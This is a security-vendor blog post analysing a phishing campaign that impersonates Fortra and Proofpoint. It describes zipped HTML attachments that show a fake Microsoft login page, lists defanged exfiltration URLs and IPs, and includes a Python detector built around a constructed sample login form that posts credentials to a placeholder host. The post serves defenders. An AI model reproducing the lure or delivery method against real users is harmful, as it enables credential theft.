Threat Actors Impersonate Email Security Providers to Steal User Credentials

					<div>
				<div>
		<div>
							<div>
			<div>
						<p>SEGs Bypassed: Microsoft, Trend Micro, IronPort</p><p>By Shirish Lavania, Cofense Phishing Defense Center</p><p>In today’s world, every organization uses email security to protect its infrastructure, because email is a common entry point for attackers spreading phishing, malware and other threats. Adversaries are therefore continuously trying to bypass secure email gateways (SEGs) to carry out their attacks. Threat actors often disguise harmful URLs within HTML attachments, which makes them harder for SEGs to block. The Phishing Defense Center (PDC) analyzed a phishing campaign that impersonates an email security provider to lure recipients into providing their user credentials via a malicious HTML attachment.</p><p><img alt=" Figure 1: Email Body" height="918" src="https://cofense.com/wp-content/uploads/2023/05/Figure-1.jpg" width="1920" /></p><p><em> Figure 1: Email Body</em></p><p>Figure 1 shows that the user received an email from “Forta”, which is likely a misspelling of Fortra. The subject mentions an “essential encrypted company email”, and a fake green banner states that the “sender is verified”, in an attempt to trick the user into clicking on the attachment.
The email instructs the user to authenticate with their credentials in order to view the secure attached document.</p><p><img alt="Figure 2: HTML File" height="262" src="https://cofense.com/wp-content/uploads/2023/05/Figure-2.png" width="980" /></p><p><em>Figure 2: HTML File</em></p><p>The attachment shows that the adversaries wanted it to look legitimate: the HTML file is named “Secure_FortraATT_2736614.html” and is packed inside the “Attachment.zip” archive, as seen in Figure 2.</p><p><img alt="Threat Actors Impersonate Email Security Providers to Steal User Credentials" height="1042" src="https://cofense.com/wp-content/uploads/2023/05/Featured-Image-3.jpg" width="1920" /></p><p><em>Figure 3: Email Body</em></p><p>In Figure 3 we see a similarly styled email that shows Fortra as the sender but also mentions Proofpoint. The attacker tried to create a false sense of security by including the footer “Secured by Proofpoint encryption”.<br />It is not uncommon for threat actors to use impersonation tactics to trick users into believing that an email is genuine.</p><p>Once the user opens the attachment, it presents a spoofed Microsoft login page, complete with a Microsoft logo to make it look familiar to the user, as seen in Figure 4.</p><p><img alt="Figure 4: Fake Microsoft Landing Page" height="1442" src="https://cofense.com/wp-content/uploads/2023/05/Figure-4.png" width="1096" /></p><p><em>Figure 4: Fake Microsoft Landing Page</em></p><p>In Figure 5, the threat actor styled the spoofed page to look like a production login page.</p><p><img alt="Figure 5: Fake Production Login Page" height="656" src="https://cofense.com/wp-content/uploads/2023/05/Figure-5.png" width="1384" /></p><p><em>Figure 5: Fake Production Login Page</em></p><p>Once the user logs in, the credentials are exfiltrated to the malicious URLs hxxps://office[.]topexecs[.]info/ (Figure 4) and
hxxps://library-query[.]info/login[.]php (Figure 5).</p><p>This campaign shows that attackers are constantly refining their techniques to lure users and bypass security measures in order to steal valuable information. Unfortunately, security solutions such as SEGs are not always effective at stopping attachment-based threats, and users end up opening them. An attentive user alerted us to this campaign with Cofense Reporter upon realizing that the phishing email was asking for sensitive information.</p>						</div>
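<p>Added example (not Cofense’s code or anything from the campaign): a small Python triage check for the delivery pattern described above, an HTML login form hidden inside a zip attachment. It builds a constructed .eml with a placeholder lure, then pulls HTML files out of zip attachments and reports the host each login form would post credentials to, so mail like this can be flagged before a user opens it. The file names, subject line and domain are constructed placeholders, not values from the campaign.</p>

```python
import email, io, zipfile
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed lure: a login form posting to an external host, modelled on the spoofed
# Microsoft page described above. The domain is a placeholder, not one from the campaign.
LURE_HTML = (b"<html><body><form method='post' action='https://login-example.invalid/login.php'>"
             b"<input name='email'><input name='password' type='password'></form></body></html>")

class FormActionParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions = []  # action URL of every <form> seen in the document

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions += [v for k, v in attrs if k == "action" and v]

def build_sample_eml() -> bytes:
    """Constructed .eml: the HTML lure packed inside Attachment.zip, as in the campaign."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as zf:
        zf.writestr("Secure_Example_000000.html", LURE_HTML)
    msg = EmailMessage()
    msg["Subject"] = "Essential encrypted company email"
    msg.add_attachment(zbuf.getvalue(), maintype="application", subtype="zip",
                       filename="Attachment.zip")
    return msg.as_bytes()

def find_credential_forms(raw_eml: bytes) -> list:
    """One finding per HTML attachment (direct or zipped) whose form posts to a remote URL."""
    msg = email.message_from_bytes(raw_eml, policy=policy.default)
    findings, html_ext = [], (".htm", ".html")
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        payload = part.get_payload(decode=True) or b""
        html_files = [(name, payload)] if name.endswith(html_ext) else []
        if name.endswith(".zip"):  # this campaign hid the HTML inside Attachment.zip
            with zipfile.ZipFile(io.BytesIO(payload)) as zf:
                html_files = [(f"{name}/{i.filename}", zf.read(i)) for i in zf.infolist()
                              if i.filename.lower().endswith(html_ext)]
        for path, data in html_files:
            parser = FormActionParser()
            parser.feed(data.decode("utf-8", errors="replace"))
            hosts = sorted({urlparse(a).hostname for a in parser.actions if urlparse(a).hostname})
            if hosts:  # an attached login form that posts elsewhere is the credential-harvest signal
                findings.append({"file": path, "post_hosts": hosts})
    return findings
```

<p>Run against real mail, the reported host list is what you compare with your own domains and the IP/URL indicators below; anything posting to an unknown host from inside an attachment deserves a look.</p>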
			</div>
				</div>
	</div>
						</div>
	
			
					<div>
				<div>
		<div>
							<div>
			<div>
		<div>
<table>
<tr><th>Indicators of Compromise</th><th>IP</th></tr>
<tr><td>hxxps://library-query[.]info/login[.]php</td><td>138.201.134.162</td></tr>
<tr><td>hxxps://office[.]topexecs[.]info/</td><td>84.247.51.110</td></tr>
<tr><td></td><td>74.119.239.234</td></tr>
</table>
						</div>
	<p>The post <a href="https://cofense.com/blog/threat-actors-impersonate-email-security-providers-to-steal-user-credentials/" rel="noreferrer" target="_blank">Threat Actors Impersonate Email Security Providers to Steal User Credentials</a> appeared first on <a href="https://cofense.com" rel="noreferrer" target="_blank">Cofense</a>.</p>
